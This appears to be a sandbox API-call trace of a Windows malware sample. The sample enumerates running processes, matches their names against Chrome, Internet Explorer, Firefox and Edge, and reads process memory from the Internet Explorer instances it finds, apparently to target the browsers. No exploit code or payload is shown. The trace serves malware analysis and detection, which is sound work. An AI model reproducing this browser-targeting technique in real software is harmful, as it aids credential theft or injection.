	[0235.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.198] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.198] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0235.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x757c
	[0235.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.199] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0235.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.199] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.200] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0235.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.200] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.200] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0235.201] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7580
	[0235.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.201] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0235.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.202] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.203] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0235.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.203] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0235.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7584
	[0235.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.204] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0235.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.204] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.205] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0235.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.205] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0235.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7588
	[0235.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.206] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0235.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.206] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.207] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0235.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.207] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0235.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0235.209] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0235.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x758c
	[0235.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.211] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0235.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.213] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.214] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0235.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.215] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0235.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7590
	[0235.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.219] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0235.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.220] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.220] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0235.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.220] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0235.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7594
	[0235.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.221] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0235.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.222] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.222] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0235.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.222] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.223] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0235.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7598
	[0235.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.224] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0235.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.224] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.256] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0235.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.256] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0235.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x759c
	[0235.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.257] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0235.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.258] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.258] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0235.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.259] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.259] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0235.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x75a0
	[0235.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.260] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0235.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.260] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.261] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0235.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.261] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.261] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0235.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x75a4
	[0235.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.262] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0235.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.263] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.263] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0235.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.264] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0235.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x75a8
	[0235.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.268] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0235.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.268] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.269] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0235.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.269] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0235.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x75ac
	[0235.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.270] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0235.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.271] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.271] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0235.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.271] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.271] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0235.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x75b0
	[0235.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.272] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0235.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.272] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.273] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0235.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.273] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.273] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0235.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x75b4
	[0235.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.274] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0235.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.275] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.275] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0235.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.276] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.276] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0235.277] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x75b8
	[0235.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.277] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0235.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.277] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.278] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0235.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.279] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0235.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x75bc
	[0235.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.281] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0235.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.281] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.282] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0235.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.282] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.282] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0235.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x75c0
	[0235.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.283] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0235.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.284] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.285] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0235.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.285] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.286] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0235.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x75c4
	[0235.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.287] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0235.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.287] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.288] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0235.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.288] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0235.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x75c8
	[0235.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0235.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0235.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0235.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.291] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.291] NtQueryInformationProcess (in: ProcessHandle=0x75c8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0235.291] ReadProcessMemory (in: hProcess=0x75c8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0235.291] ReadProcessMemory (in: hProcess=0x75c8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0235.291] ReadProcessMemory (in: hProcess=0x75c8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0235.291] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0235.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0235.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x75cc
	[0235.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.292] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0235.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0235.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0235.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.293] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.293] NtQueryInformationProcess (in: ProcessHandle=0x75cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0235.294] ReadProcessMemory (in: hProcess=0x75cc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0235.294] ReadProcessMemory (in: hProcess=0x75cc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0235.294] ReadProcessMemory (in: hProcess=0x75cc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0235.294] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0235.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0235.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x75d0
	[0235.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.295] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0235.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.296] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.296] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0235.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
